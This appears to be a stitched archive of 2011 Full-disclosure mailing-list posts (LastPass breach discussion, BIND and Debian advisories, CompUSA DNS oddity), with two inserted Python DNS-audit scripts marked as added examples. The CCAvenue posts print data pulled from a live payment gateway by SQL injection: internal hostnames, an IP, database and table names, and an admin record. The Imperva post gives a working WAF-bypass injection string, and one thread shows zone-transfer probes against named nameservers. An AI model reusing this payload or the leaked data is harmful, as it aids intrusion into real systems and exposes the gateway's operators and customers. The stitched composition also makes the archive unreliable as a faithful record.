Re: [Full-disclosure] Lastpass Security Issue
Ryan,

The blog post indicates severe security lapses; for example: Why did the Asterisk server have connectivity to the db? If there was some kind of mashup I would expect it to have limited connectivity but I'm not aware of anything like that.

If these guys are in the business of security they need to go beyond best practices - take PCI DSS for example; one of the first steps is to limit the Cardholder Data Environment. Different routed and filtered subnets with internal firewalls.

I've got a million other suggestions, but w/o further research or information it would be just guessing. Where there is smoke...

That being said, lapses happen all the time. I think they are handling it the right way and being over cautious - no one wants to get the notification of a compromise the other way.

I sincerely hope they use this as an opportunity to review their entire security lifecycle.

Policy -- Procedure -- Control -- Audit -- Refinement

In a different regulatory environment they'd have to follow specific security regimens and audit frequencies with statistically relevant samples.

I'm sure the entire team over there is putting in 110%; good luck guys.

Liam

-----Original Message-----
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Ryan Sears
Sent: Thursday, May 05, 2011 6:39 AM
To: full-disclosure
Subject: [Full-disclosure] Lastpass Security Issue

Hey all,

Early this morning the folks over at LastPass decided to issue a warning about a potential security issue based on the fact that they detected some anomalies in their logs.

http://blog.lastpass.com/2011/05/lastpass-security-notification.html

Basically the post outlines the fact that even though they've investigated everything they can think of, they still noticed data potentially being exfiltrated from one of their DBs, as more information came out than was going in.

Because of the fact they can't account for the traffic from any legitimate source, they're being paranoid and assuming the worst (that someone found a SQL injection presumably). Even though their passwords were all salted, they're still forcing everyone to change their master password. Those using 2-factor are relatively unaffected, although they have to change their master passwords as well.

This might leave some people who use lastpass in 'Re-enable account hell', where they have their email password stored on lastpass, but can't verify and login to lastpass without clicking an activation link in their email. This can be solved by using one of the plugins in offline mode with your old master password. I'm not sure why they didn't mention it, but this has solved a lot of people's problems.

All in all IMHO these guys take security quite seriously. They noticed an anomaly, investigated and hours later posted something about it on their blog. I'm not sure why no emails have been sent out, but there has been speculation that it would have taken too long (http://blog.lastpass.com/2011/05/lastpass-security-notification.html?showComment=1304571300013#c1232708813079521918), which I don't really agree with. That should've been their first step IMHO, and that's where they fell on their face a bit with all this.

They DO put impressive security measures into place when something does happen though, as seen in the XSS bug found. They implemented HSTS, X-Frame-Options, CSP, which I've only seen used in super rare cases:

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They're also implementing PBKDF2, so that makes me feel as though with every security issue they're dealing with they don't just identify and remediate, but actually restructure their infrastructure in order to hedge against any potential future attack vectors. I personally see this as the best response of any company I've ever seen from a security standpoint.

Thoughts?

Ryan

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DNS BIND Security Advisory: RRSIG Queries Can Trigger Server Crash When Using Response Policy Zones
Note: https://www.isc.org/CVE-2011-1907 is the authoritative source for this Security Advisory. Please check the source for any updates.

Summary: When a name server is configured with a response policy zone (RPZ), queries for type RRSIG can trigger a server crash.

CVE: CVE-2011-1907
Posting date: 05 May 2011
Program Impacted: BIND
Versions affected: 9.8.0
Severity: High
Exploitable: remotely

Description:

This advisory only affects BIND users who are using the RPZ feature configured for RRset replacement. BIND 9.8.0 introduced Response Policy Zones (RPZ), a mechanism for modifying DNS responses returned by a recursive server according to a set of rules which are either defined locally or imported from a reputation provider. In typical configurations, RPZ is used to force NXDOMAIN responses for untrusted names. It can also be used for RRset replacement, i.e., returning a positive answer defined by the response policy. When RPZ is being used, a query of type RRSIG for a name configured for RRset replacement will trigger an assertion failure and cause the name server process to exit.

Workarounds: Install 9.8.0-P1 or higher.

Active exploits: None. However, some DNSSEC validators are known to send type=RRSIG queries, innocently triggering the failure.

Solution: Use RPZ only for forcing NXDOMAIN responses and not for RRset replacement.

CVSS Score: Base 6.1, adjusted for lack of targets, score is 1.5 (AV:N/AC:L/Au:N/C:N/I:N/A:C/E:P/RL:O/RC:C/TD:L)

For more information on the Common Vulnerability Scoring System and to obtain your specific environmental score please visit: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Thank you to Mitsuru Shimamura at Internet Initiative Japan for finding this defect.
For more information on support and other services for ISC's software products, please visit https://www.isc.org/community/blog/201102/BIND-support

For more information about DNS RPZ, please check security advisory @ https://www.isc.org/CVE-2011-1907

Questions about this Security Advisory should be sent to the ISC Security Officer security-offi...@isc.org.

--
Larissa Shapiro
Internet Systems Consortium Product Manager
Technology Leadership for the Common Good
+1 650 423 1335
www.isc.org
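
An added example, not part of the ISC advisory and not ISC code: a Python check that walks an RPZ policy zone file and sorts its records into NXDOMAIN rules and RRset-replacement rules, so an operator still on 9.8.0 can see which entries fall under the condition the advisory describes. The sample zone, its names and its addresses are constructed; the `CNAME .` (NXDOMAIN) and `CNAME *.` (NODATA) encodings are taken from BIND's RPZ documentation rather than from this page, and `audit_rpz` and the other function names are hypothetical.

```python
import re

# Optional TTL field such as "300" or "1h30m" (BIND time-unit suffixes).
TTL_RE = re.compile(r"(?:\d+[smhdw])*\d*", re.I)
CLASSES = {"IN", "CH", "HS"}

# Constructed sample policy zone; every name and address is illustrative.
SAMPLE_ZONE = """\
$TTL 300
@   IN SOA localhost. hostmaster.localhost. (
        2011050501 ; serial
        3600 600 86400 300 )
    IN NS  localhost.
bad.example.com        CNAME .                 ; NXDOMAIN
*.bad.example.com      CNAME .
quiet.example.net      CNAME *.                ; NODATA
ads.example.org    60  IN A  192.0.2.10        ; RRset replacement
                       IN AAAA 2001:db8::10    ; same owner, inherited
portal.example.org     CNAME walled-garden.example.
note.example.org       TXT "blocked; see (policy)"
"""


def _clean(raw):
    """Strip the comment and grouping parentheses from one physical line.

    Returns (text, change in paren depth). Text inside double quotes is kept
    verbatim so a ';' or '(' in a TXT string is not misread.
    """
    out, delta, quoted, prev = [], 0, False, ""
    for ch in raw:
        if ch == '"' and prev != "\\":
            quoted = not quoted
        elif not quoted and ch == ";":
            break
        elif not quoted and ch in "()":
            delta += 1 if ch == "(" else -1
            ch = " "
        out.append(ch)
        prev = ch
    return "".join(out).rstrip(), delta


def parse_records(text):
    """Yield (first line number, owner, type, rdata tokens) for each record."""
    owner, pending, start, depth = None, "", 0, 0
    for n, raw in enumerate(text.splitlines(), 1):
        line, delta = _clean(raw)
        if depth == 0:
            pending, start = line, n
        else:
            pending += " " + line          # continuation inside ( ... )
        depth += delta
        if depth > 0 or not pending.strip() or pending.lstrip().startswith("$"):
            continue                       # unfinished, blank, or $TTL/$ORIGIN
        inherits_owner = pending[0].isspace()
        tokens = pending.split()
        if not inherits_owner:
            owner, tokens = tokens[0], tokens[1:]
        # TTL and class are optional and may come in either order.
        while tokens and (TTL_RE.fullmatch(tokens[0]) or tokens[0].upper() in CLASSES):
            tokens = tokens[1:]
        if tokens:
            yield start, owner, tokens[0].upper(), tokens[1:]


def classify(rtype, rdata):
    """Map one policy-zone record to the RPZ action it encodes."""
    if rtype in ("SOA", "NS"):
        return "zone-data"                 # required zone records, not policy
    if rtype == "CNAME" and rdata == ["."]:
        return "nxdomain"
    if rtype == "CNAME" and rdata == ["*."]:
        return "nodata"
    return "replacement"                   # any other record rewrites the answer


def audit_rpz(text):
    """Group records by action; 'replacement' is what the advisory warns about."""
    report = {"zone-data": [], "nxdomain": [], "nodata": [], "replacement": []}
    for lineno, owner, rtype, rdata in parse_records(text):
        report[classify(rtype, rdata)].append((lineno, owner, rtype, " ".join(rdata)))
    return report


if __name__ == "__main__":
    for lineno, owner, rtype, rdata in audit_rpz(SAMPLE_ZONE)["replacement"]:
        print(f"line {lineno}: {owner} {rtype} {rdata}  <- RRset replacement")
```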
Re: [Full-disclosure] 0dayz on the 0day
Was anyone able to test and validate this?

Infolookup
http://infolookup.securegossip.com
www.twitter.com/infolookup

-----Original Message-----
From: Infant Overflow infant.overf...@gmail.com
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Thu, 5 May 2011 10:34:37
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] 0dayz on the 0day
[Full-disclosure] Silently Pwning Protected-Mode IE9 and Innocent Windows Applications
Our advanced binary planting research goes on... and it's time to reveal some interesting hacks, for instance how to exploit binary planting (or DLL hijacking, if you prefer the less suitable term) to execute remote malicious code through Internet Explorer 9 in protected mode on Windows 7 - without issuing any security warnings. Or how to do the same in Internet Explorer 8 on Windows XP, only even more stealthy.

The crux is described in our blog post:

http://blog.acrossecurity.com/2011/05/silently-pwning-protected-mode-ie9-and.html or http://bit.ly/im6LcD,

while the final missing link to the exploit will be revealed at the Hack in the box conference in Amsterdam on May 19 (http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1399), and shortly thereafter to the rest of the world.

Our Guidelines for developers have already been updated for those who hate seeing binary planting, DLL hijacking, DLL preloading or insecure library loading in their software creations:

http://www.binaryplanting.com/guidelinesDevelopers.htm

Best regards,

Mitja Kolsek
CEO&CTO

ACROS, d.o.o.
Makedonska ulica 113
SI - 2000 Maribor, Slovenia
tel: +386 2 3000 280
fax: +386 2 3000 282
web: http://www.acrossecurity.com

ACROS Security: Finding Your Digital Vulnerabilities Before Others Do
[Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
**
(+) Authors : d3hydr8
(+) WebSite : darkode.com
(+) Date : 06.05.2011
(+) Hour : 08:21 AM
(+) Targets : CCAvenue.com (Payment Gateway)
(+) Document: ESA.int Full Disclosure (UPDATED)
(+) Method : Hidden SQL Injection
**
[ + ] Date: Wed May 3 04:47:33 2011
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
But they encrypted everything, right?

On Fri, May 6, 2011 at 5:33 PM, d3hydr8 D d3hy...@hotmail.com wrote:
> **
> (+) Authors : d3hydr8
> (+) WebSite : darkode.com
> (+) Date : 06.05.2011
> (+) Hour : 08:21 AM
> (+) Targets : CCAvenue.com (Payment Gateway)
> (+) Document: ESA.int Full Disclosure (UPDATED)
> (+) Method : Hidden SQL Injection
> **
> [ + ] Date: Wed May 3 04:47:33 2011
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
adu_id adu_user adu_pwd adu_status dept_id remote_access mobile_number
. . .
Acc1041 Risk Risk A Acc

lol, definitely a risky guy

--
Cheers,
Kai
[Full-disclosure] [SECURITY] [DSA 2231-1] otrs2 security update
Debian Security Advisory DSA-2231-1    secur...@debian.org
http://www.debian.org/security/    Florian Weimer
June 6, 2011    http://www.debian.org/security/faq

Package        : otrs2
Vulnerability  : cross-site scripting
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-1518

Multiple cross-site scripting vulnerabilities were discovered in Open Ticket Request System (OTRS), a trouble-ticket system. (CVE-2011-1518)

In addition, this security update fixes a failure when upgrading the package from lenny to squeeze.

The oldstable distribution (lenny) is not affected by this problem.

For the stable distribution (squeeze), this problem has been fixed in version 2.4.9+dfsg1-3+squeeze1.

For the unstable distribution (sid), this problem has been fixed in version 2.4.10+dfsg1-1.

We recommend that you upgrade your otrs2 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] [SECURITY] [DSA 2232-1] exim4 security update
Debian Security Advisory DSA-2232-1    secur...@debian.org
http://www.debian.org/security/    Florian Weimer
May 06, 2011    http://www.debian.org/security/faq

Package        : exim4
Vulnerability  : format string vulnerability
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-1764
Debian Bug     : 624670

It was discovered that Exim, the default mail transport agent in Debian, uses DKIM data obtained from DNS directly in a format string, potentially allowing malicious mail senders to execute arbitrary code. (CVE-2011-1764)

The oldstable distribution (lenny) is not affected by this problem because it does not contain DKIM support.

For the stable distribution (squeeze), this problem has been fixed in version 4.72-6+squeeze1.

For the unstable distribution (sid), this problem has been fixed in version 4.75-3.

We recommend that you upgrade your exim4 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[Full-disclosure] WTF
WTF ?

notebook:~$ ping www.compusa.com
PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.019 ms

notebook:~$ ping www.tigerdirect.com
PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.022 ms
[Full-disclosure] Imperva SecureSphere - SQL injection filter bypass
===
Imperva SecureSphere - SQL injection filter bypass
===

Affected Software : SecureSphere Web Application Firewall (WAF)
Severity : High
Local/Remote : Remote
Author: @drk1wi

[Summary]

Due to a typo in one of the rules of the sql injection engine the WAF can be bypassed by appending a specially crafted string.

[Vulnerability Details]

the vector:

15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'

won't be classified as malicious and will bypass the SQL Injection filter.

'and '0having'='0having' is causing the bypass.

[Time-line]

8/07/2010 - Vendor notified
10/07/2010 - Vendor response
12/08/2010 - Vendor patch release
06/05/2011 - Public disclosure (I was cleaning up my comp.)

[Fix Information]

Apply ADC Content Update from 12 - August - 2010

Cheers,
@drk1wi
[Full-disclosure] CCAvenue Payment Gateway SQL Injection Vulnerability
**
(+) Authors : i:Spy
(+) WebSite : ispyteam.com
(+) Date : 06.05.2011
(+) Hour : 08:21 AM
(+) Targets : CCAvenue.com (Payment Gateway)
(+) Document: ESA.int Full Disclosure (UPDATED)
(+) Method : Hidden SQL Injection
**
[ + ] Date: Wed May 3 04:47:33 2011
Re: [Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
[ + ] Date: Wed May 3 04:47:33 2011 ...
--
Kindly disregard the previous report. I got the date all mixed up.

hah! You must be joking right! Also where exactly was the *hidden SQL injection you said?? Cmon! come out clean about the source...

Thanks, :)
d3hydr8
Re: [Full-disclosure] WTF
On Fri, May 6, 2011 at 6:49 PM, Gustavo gustavorober...@gmail.com wrote:
> WTF ?
>
> notebook:~$ ping www.compusa.com
> PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data.
> 64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.019 ms

Same here ... this time on Windows :

F:\>ping www.compusa.com

Pinging bh.georedirector.akadns.net [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

F:\>nslookup www.compusa.com
Server:
Address: 9

Non-authoritative answer:
Name:    bh.georedirector.akadns.net
Address: 127.0.0.1
Aliases: www.compusa.com, compusa.syx.com.akadns.net

Normally I'd say that's a DNS config screwup, which would make them unreachable (since their website is not on my system). However, Google seems to be able to reach them if you use the site preview option in the search results :

http://www.google.com/search?q=www.compusa.com

Curious.

Relevant: http://forums.opendns.com/comments.php?DiscussionID=9721

Nick

--
Leave the Olympics in Greece, where they belong.
[Full-disclosure] CCAvenue.com Payment Gateway Vulnerable SQL Injection UPDATE
** (+) Authors : d3hydr8 (+) WebSite : darkode.com (+) Date : 06.05.2011 (+) Hour : 08:21 AM (+) Targets : CCAvenue.com (Payment Gateway) (+) Document: ESA.int Full Disclosure (UPDATED) (+) Method : Hidden SQL Injection ** [ + ] Date: Tue May 3 04:47:33 2011 [ + ] Displaying information about MSSQL host ! [ + ] @@VERSION : Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) [ + ] USER () : iusr_ccavenueiusr_ccavenue [ + ] S_USER () : iusr_ccavenue [ + ] DB_NAME () : gateway [ + ] HOST_NAME () : AV-2 [ + ] SERVER_NAME () : AVDB-3 [ + ] SERVER_TYPE () : Apache/2.2.14 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 [ + ] X-POWERED-By () : Servlet 2.5; JBoss-5.0/JBossWeb-2.1 [ + ] IP_ADDRESS_INFO : 124.153.83.27 -- [ + ] Displaying list of databases on this MSSQL host ! [ DATABASE: 0 ] : gateway [ DATABASE: 1 ] : master [ DATABASE: 2 ] : tempdb [ DATABASE: 3 ] : model [ DATABASE: 4 ] : msdb [ DATABASE: 5 ] : Reseller - [ DATABASE: 0 ] : gateway [ + ] Displaying Tables inside DB: [ TABLES: 0 ] : addl_merchant_details [ TABLES: 1 ] : admin_details [ TABLES: 2 ] : Admn_dept_roles [ TABLES: 3 ] : Admn_depts [ TABLES: 4 ] : Admn_prvlg_grps [ TABLES: 5 ] : Admn_prvlgs [ TABLES: 6 ] : Admn_role_prvlgs [ TABLES: 7 ] : Admn_roles [ TABLES: 8 ] : Admn_user_prvlgs [ TABLES: 9 ] : Admn_users [ TABLES: 10 ] : amex_cc_details [ TABLES: 11 ] : AMEX_CCDETAILS [ TABLES: 12 ] : amex_mer_details [ TABLES: 13 ] : amtShopperCart [ TABLES: 14 ] : amtShopperCart_MMT [ TABLES: 15 ] : auctionPayment [ TABLES: 16 ] : Auto_cancel [ TABLES: 17 ] : Bop_bank [ TABLES: 18 ] : callcenter_user_login_history [ TABLES: 19 ] : ccav_default_charges [ TABLES: 20 ] : Ccav_genid [ TABLES: 21 ] : Ccav_links [ TABLES: 22 ] : ccav_merchant_options [ TABLES: 23 ] : ccav_payout_allocated_keys [ TABLES: 24 ] : ccav_payout_credit_logs [ TABLES: 25 ] : ccav_payout_credits 
Re: [Full-disclosure] WTF
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 05/06/2011 11:15 PM, Nick Boyce wrote:

On Fri, May 6, 2011 at 6:49 PM, Gustavo gustavorober...@gmail.com wrote:

WTF ?

notebook:~$ ping www.compusa.com
PING bh.georedirector.akadns.net (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost.localdomain (127.0.0.1): icmp_req=1 ttl=64 time=0.019 ms

Same here ... this time on Windows :

F:\>ping www.compusa.com
Pinging bh.georedirector.akadns.net [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

F:\>nslookup www.compusa.com
Server:
Address: 9

Non-authoritative answer:
Name: bh.georedirector.akadns.net
Address: 127.0.0.1
Aliases: www.compusa.com, compusa.syx.com.akadns.net

Normally I'd say that's a DNS config screwup, which would make them unreachable (since their website is not on my system). However, Google seems to be able to reach them if you use the site preview option in the search results :
http://www.google.com/search?q=www.compusa.com

Curious.

Relevant:
http://forums.opendns.com/comments.php?DiscussionID=9721

Nick
--
Leave the Olympics in Greece, where they belong.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

About dns

;; ADDITIONAL SECTION:
ns01.highspeedbackbone.net. 240003 IN A 199.181.77.21
ns02.highspeedbackbone.net. 240003 IN A 199.181.78.22
ns03.highspeedbackbone.net. 240003 IN A 199.181.77.23
ns04.highspeedbackbone.net. 240003 IN A 199.181.78.24

testing one by one ...

[ksha@warbof ~]$ dig compusa.com @199.181.77.21 AXFR
; DiG 9.8.0 compusa.com @199.181.77.21 AXFR
;; global options: +cmd
; Transfer failed.

[ksha@warbof ~]$ dig compusa.com @199.181.78.22 AXFR
; DiG 9.8.0 compusa.com @199.181.78.22 AXFR
;; global options: +cmd
; Transfer failed.

[ksha@warbof ~]$ dig compusa.com @199.181.77.23 AXFR
; DiG 9.8.0 compusa.com @199.181.77.23 AXFR
;; global options: +cmd
; Transfer failed.

and the last allows zone transfer.
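
The nslookup output earlier in this thread shows a public name whose alias chain ends at 127.0.0.1. As an added example (not part of the original posts), the Python below audits records exported from a zone you operate and reports every name whose CNAME chain ends at a loopback address; going beyond the case in the thread, it also flags RFC 1918 targets and CNAME loops. The function names, the example.com and example.net names and the sample records are constructed for illustration.

```python
import ipaddress
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in dig answer format (name TTL class type rdata); not the page's data.
SAMPLE_RECORDS = """\
www.example.com.           60  IN CNAME www.geo.example.net.
www.geo.example.net.       300 IN CNAME bh.geo.example.net.
bh.geo.example.net.        30  IN A     127.0.0.1
autodiscover.example.com.  300 IN A     10.100.100.108
media.example.com.         900 IN A     203.0.113.89
loop.example.com.          60  IN CNAME loop.example.com.
"""

def parse_records(text):
    """Return (a_records, cnames): name -> [ip, ...] and name -> target."""
    a_records, cnames = {}, {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0].startswith(";"):
            continue  # skip blanks, comments and truncated records
        name, rtype, rdata = fields[0].lower(), fields[3].upper(), fields[4].lower()
        if rtype == "A":
            a_records.setdefault(name, []).append(rdata)
        elif rtype == "CNAME":
            cnames[name] = rdata
    return a_records, cnames

def classify(ip_text):
    """Label an address a public name should not resolve to, else None."""
    ip = ipaddress.ip_address(ip_text)
    if ip.is_loopback:
        return "loopback"
    return "rfc1918" if any(ip in net for net in RFC1918) else None

def audit(text):
    """Follow CNAME chains and report names that end at a non-routable address."""
    a_records, cnames = parse_records(text)
    findings = []
    for name in sorted(set(a_records) | set(cnames)):
        target, seen = name, set()
        while target in cnames and target not in seen:
            seen.add(target)
            target = cnames[target]
        if target in seen:  # chain came back to a name already visited
            findings.append((name, "cname-loop", target))
            continue
        findings += [(name, classify(ip), ip) for ip in a_records.get(target, []) if classify(ip)]
    return findings

if __name__ == "__main__":
    print(*audit(SAMPLE_RECORDS), sep="\n")
```

The RFC 1918 check uses an explicit network list because `ipaddress`'s `is_private` also covers documentation ranges such as 203.0.113.0/24, which the sample uses as a stand-in for a public address.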